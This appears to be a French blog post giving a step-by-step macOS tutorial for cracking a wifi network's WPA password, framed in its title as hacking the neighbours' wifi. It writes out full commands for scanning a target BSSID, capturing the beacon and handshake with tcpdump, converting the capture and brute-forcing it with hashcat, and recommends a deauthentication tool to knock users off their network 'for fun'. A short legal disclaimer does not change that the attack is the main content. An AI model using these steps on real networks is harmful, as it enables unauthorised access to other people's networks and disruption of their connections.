Comment hacker le mot de passe wifi (WPA) de vos voisins sur MacOs?

Corentin Robert
5 min readMar 30, 2020

--

Suivez étape par étape comment réussir à hacker le mot de passe d’un wifi.

wifi hack wpa macos

L’autre jour, après une discussion avec mon coloc, j’ai voulu découvrir comment hacker un mot de passe wifi (le nôtre bien-sûr) en utilisant mon MacBook Pro. J’ai commencé à étudier la question en regardant quelques vidéos et en lisant des articles pour finalement réussir à décrypter la clé wifi.

Cet article est un condensé d’informations qui va vous permettre de comprendre, comment cracker un mot de passe wifi (le vôtre bien-sûr), étape par étape.

Merci de lire attentivement cet encart avant de commencer!

Sachez qu’il est strictement illégal d’accéder à un point d’accès Wi-Fi protégé (WPA), sauf si vous avez l’autorisation du propriétaire. Cet article doit être utilisé à des fins éducatives et pour vous aider à comprendre comment un pirate informatique peut tirer parti de votre wifi.

Qu’est-ce qu’une attaque WPA? (Wi-Fi Protected Access)

WPA est un label de sécurité pour l’utilisateur connecté sur un point d’accès wifi. Il offre un cryptage des données supplémentaire et une validation de l’utilisateur plus sécurisé que la clé WEP (Wired Equivalent Privacy).

Cette attaque se réalise en 3 étapes:

  • Identifier les réseaux wifi avoisinants et choisir son point d’accès cible: son nom (=BSSID) et sa fréquence (channel).
  • Récupérer les informations de la fréquence: Une balise (beacon.cap) & une poignée de main (handshake.cap)
  • Cracker le wifi en utilisant la fonction hashcat.

Il peut être difficile d’obtenir la “poignée de main” car on peut l’obtenir uniquement lorsque quelqu’un se connecte au réseau wifi cible. On peut parfois donc attendre longtemps.

La bonne nouvelle c’est que l’on peut déconnecter les gens de leur réseau wifi à l’aide de JamWifi2. Très drôle pour énerver sa famille ou pour impressionner son entourage, cela nous permet également d’obtenir la “poignée de main” lorsque la personne va se reconnecter à son réseau.

Prêt à hacker un réseau wifi?

Étape n°1: identifier le réseau wifi cible.

  • Ouvrez Terminal (⌘ + enter + “Terminal”).
  • Copiez-collez la commande ci-dessous.
sudo airport -s

Vous allez obtenir en face de vous une liste de réseaux wifi à proximité.

sudo airport -s
sudo airport -s
  • Copiez le BSSID du réseau wifi cible.
export BSSID=$TARGET_MAC_ADDRESS

Veuillez remplacer “$TARGET_MAC_ADDRESS” par le BSSID du point d’accès cible.

  • Se déconnecter de son réseau wifi.
sudo airport -z
  • Indiquez la fréquence (channel) du réseau cible.
sudo airport -c$Channel

Veuillez remplacer “$Channel” par la fréquence du point d’accès cible.

Etape pour identifier le réseau wifi cible.

Étape n°2: récupérer les informations de la fréquence.

  • Récupérer la balise (beacon.cap).
sudo tcpdump “type mgt subtype beacon and ether src $BSSID” -I -c 1 -i en0 -w beacon.cap

Cette commande va créer un nouveau fichier, avec l’ensemble des données recueillies en fonction du réseau cible.

  • Récupérer la poignée de main (handshake.cap).
sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i en0 -w handshake.cap// Ctrl-C pour arrêter la récupération si le processus est trop long.

Cette commande permet de recueillir les données de l’utilisateur. Veuillez noter qu’il est préférable d’obtenir à minima 4 paquets.

Comme indiqué en introduction, cette étape peut prendre du temps car vous devez attendre qu’un utilisateur se connecte au réseau wifi. Si vous souhaitez le déconnecter et accélérer le processus, vous pouvez télécharger JamWifi2, scanner les réseaux wifi autour de vous et cliquez sur “Deaths” après avoir sélectionné le réseau cible.

  • Fusionner les deux fichiers obtenus.
mergecap -a -F pcap -w capture.cap beacon.cap handshake.cap

Il semblerait que la formule ci-dessus fonctionne afin de fusionner les deux fichiers obtenus préalablement. Je n’ai cependant jamais compris pourquoi mais cela ne fonctionne pas sur mon MacBook Pro. Si c’est aussi votre cas, voici une méthode subsidiaire:

  1. Télécharger Wireshark.
  2. Ouvrez le fichier “beacon.cap”
  3. Fusionnez (merge) avec le fichier “handshake.cap”.
  4. Sauvegarder le fichier avec le nom “capture.cap”.

Étape n°3: Cracker le réseau wifi en utilisant la fonction hashcat.

  • Ouvrez le Terminal.
  • Installez la fonction hashcat.
brew install hashcat
  • Attendez que le téléchargement soit terminé.
  • Copiez-Collez la formule ci-dessous.
cap2hccapx capture.cap capture.hccapx

Cette commande transforme le fichier capture.cap que vous avez obtenu lors de l’étape n°2 en capture.hccapx

Si cela ne fonctionne pas, voici une plateforme alternative qui vous permet de déposer votre fichier capture.cap pour obtenir le fichier en .hccpax.

  • Hacker le wifi avec la méthode de votre choix.

Il existe plusieurs méthodes pour hacker un wifi, voici une présentation de deux d’entre elles:

Liste de mots Cela consiste à tester tous les mots d’une liste. Voici une liste de mots de vous pouvez télécharger. Il en existe pleins d’autres mais sont souvent composées de +/- 8 lettres.

hashcat -m 2500 capture.hccapx wordlist.txt//le hack va démarrer, merci de patienter.

BrutForce — Cela consiste à essayer de très nombreux mot de passe (+1M) pour éventuellement tomber sur le bon.

hashcat -m 2500 -a3 capture.hccapx “?d?d?d?d?d?d?d?d”//le hack va démarrer, merci de patienter.

Veuillez noter qu’en ajoutant “?d?d?d?d?d?d?d?d” au hack, vous lui indiquez que le mot de passe aura au minimum 8 caractères. Plus vous ajoutez de caractères, plus le temps du hack sera long.

  • Prenez votre mal en patience.

Une fois la hack lancé, la recherche du mot de passe peut être extrêmement long (de quelques heures à quelques jours) ou extrêmement rapide (de quelques secondes à quelques minutes) et vous n’y pouvais absolument rien. Cela dépend uniquement de la complexité du mot de passe du réseau wifi ciblé par vos soins.

Par Corentin Robert, le 30 Mars 2020.

👨‍💻 Retrouvez d’autres articles tech & voyages sur mon blog: cocobay.io

👉 Suivez moi sur mon profil Linkedin et Twitter.

--

--

Corentin Robert
Corentin Robert

Responses (1)